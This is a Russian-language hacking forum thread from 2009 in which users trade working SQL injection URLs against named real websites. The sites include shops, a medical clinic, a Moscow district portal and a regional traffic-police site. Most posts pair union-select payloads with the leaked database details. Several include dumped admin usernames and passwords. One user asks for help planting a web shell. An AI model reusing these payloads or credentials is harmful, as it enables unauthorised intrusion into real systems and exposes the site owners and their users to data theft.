ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7341  
Старый 05.01.2009, 02:54
Аватар для foopi
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527

Репутация: 62
Отправить сообщение для foopi с помощью ICQ
По умолчанию

Код:
http://www.kinoteatrdoc.ru/press.php?id=-1+union+select+version(),user(),database()--
version():4.1.22
user():kinoteatr_mysql@194.85.92.114
database():kinoteatr_kd
PR:5; тИЦ:850

Код:
http://sok.sao.mos.ru/news_full.php?id=-1+union+select+1,unhex(hex(user())),unhex(hex(version())),unhex(hex(database())),5--
version():4.1.12
user():sao@chicken
database:sao
PR:4; тИЦ:700

Код:
http://www.doctor-gynecolog.ru/index.phtml?id=-1+union+select+concat_ws(0x3a,666,username,userpass),2+from+poll_user+limit+0,1/*
version():5.0.45
user():medsunr_d-gyn@localhost
database():medsunr_d-gyn
PR:3;тИЦ:50
 
Ответить с цитированием

  #7342  
Старый 05.01.2009, 04:07
Аватар для dr.Pilulkin
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827

Репутация: 48
По умолчанию

Код:
http://www.aquaponics-shop.com/aquaponics-shop/products.php?prod_id=-25+union+select+1,2,binary(user()),4,5,6,7,8--
apshop@localhost
5.0.16
aquaponicsshop
Код:
http://www.ibaysilvershop.com/show_cart.php?new=cat_id=42%20AND%20prod_id=-3+union+select+1,2,user(),4,5,6,7,8--
ibaysilv_admin@localhost
5.0.67-community
ibaysilv_ibays
Код:
http://www.ibaysilvershop.com/show_cart.php?new=cat_id=42%20AND%20prod_id=-3+union+select+1,2,concat_ws(char(58),username,password,email),4,null,6,7,8+from+ibaysilv_ibays.admin--
edmd_2005:edmd_2005:info@ibaysilvershop.com
http://www.ibaysilvershop.com/admin/
 
Ответить с цитированием

  #7343  
Старый 05.01.2009, 04:08
Аватар для lexus5122
lexus5122
Новичок
Регистрация: 16.03.2007
Сообщений: 24
Провел на форуме:
145084

Репутация: 2
По умолчанию

Помогите залить шелл:

Цитата:
http://log.hotfix.ru/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null %20%20,null,null,null,null,null,null,null,null,nul l,null%20%20,null,null,null,null,null,null,null,nu ll,null,null%20%20,null%20from%20pphl_users%20limi t%200,1&action=edit

только предварительно войдите акк:

Цитата:
имя: lexus22
пароль: RmPhsJ
 
Ответить с цитированием

  #7344  
Старый 05.01.2009, 09:53
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Rfe.org - PR 8 ~3к
Цитата:
http://rfe.org/showCat.php?cat_id=-2+union+select+1,unhex(hex(concat_ws(0x3a,user,pas sword))),3,4,5,6,7,8+from+mysql.user/*
4 ветка + права
 
Ответить с цитированием

  #7345  
Старый 05.01.2009, 13:43
Аватар для diznt
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

PR 4

http://rpolice.ru/index.php?page=album&type=session&DocID=162&album_ page='

скуль
управление гибдд
 
Ответить с цитированием

  #7346  
Старый 05.01.2009, 14:04
Аватар для ..::TROYAN::..
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Код:
http://www.intelit.kiev.ua/?page=konkursy&state=view&konkursy_id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,login,pass),6,7+from+test_users+limit+1,1--
cannabies::xqjhze

Код:
http://www.intelit.kiev.ua/?page=konkursy&state=view&konkursy_id=-1+union+select+1,2,3,4,table_name,6,7+from+information_schema.tables+limit+0,1--
Код:
http://www.intelit.kiev.ua/?page=konkursy&state=view&konkursy_id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7--
intelit_user@localhost:5.0.67-community-log:intelit_intelit
тИЦ: 20
Pagerank: 3
 
Ответить с цитированием

  #7347  
Старый 05.01.2009, 15:59
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Код:
http://www.ukbaristachampionship.co.uk/index.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5   ,6--
user(): ukbaristac@213.171.218.94
version(): 4.0.20-standard-log
database(): ukbaristac
PR: 4
 
Ответить с цитированием

  #7348  
Старый 05.01.2009, 17:07
Аватар для F4R
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

Цитата:
Сообщение от diznt  
PR 4

http://rpolice.ru/index.php?page=album&type=session&DocID=162&album_ page='

скуль
управление гибдд

кто решится раскрутить?
 
Ответить с цитированием

  #7349  
Старый 05.01.2009, 21:23
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

F4R, diznt
Цитата:
http://rpolice.ru/index.php?page=album&type=session&DocID=162&album_ page=-1
я думаю это не иьект!
 
Ответить с цитированием

  #7350  
Старый 05.01.2009, 21:33
Аватар для Gemini12
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

Цитата:
Сообщение от sabe  
F4R, diznt

я думаю это не иьект!
это пхп
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ